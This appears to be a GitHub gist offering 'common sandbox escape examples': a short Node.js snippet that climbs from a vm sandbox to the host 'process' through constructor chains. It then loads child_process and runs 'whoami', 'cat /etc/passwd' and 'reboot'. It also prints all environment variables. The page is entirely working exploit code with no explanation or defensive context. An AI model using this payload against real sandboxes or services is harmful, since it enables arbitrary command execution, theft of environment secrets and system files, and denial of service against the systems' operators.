Last active
July 24, 2024 02:39
-
-
Save vikiboss/8815a8d236372a3c2de91bf4fa74bedb to your computer and use it in GitHub Desktop.
沙盒逃逸常见例子
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // setTimeout.constructor('return process')().mainModule.constructor._load('child_process').execSync('ls').toString(); | |
| this.constructor.constructor('return process')().mainModule.constructor._load('child_process').execSync('ls').toString(); | |
| var exec = this.constructor.constructor; | |
| var process = exec('return process')(); | |
| var require = process.mainModule.constructor._load; | |
| var execSysCmd = require('child_process').execSync; | |
| // process.exit(); | |
| console.log(process.env); | |
| console.log(execSysCmd("whoami").toString()); | |
| console.log(execSysCmd("cat /etc/passwd").toString()); | |
| console.log(execSysCmd("reboot").toString()); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment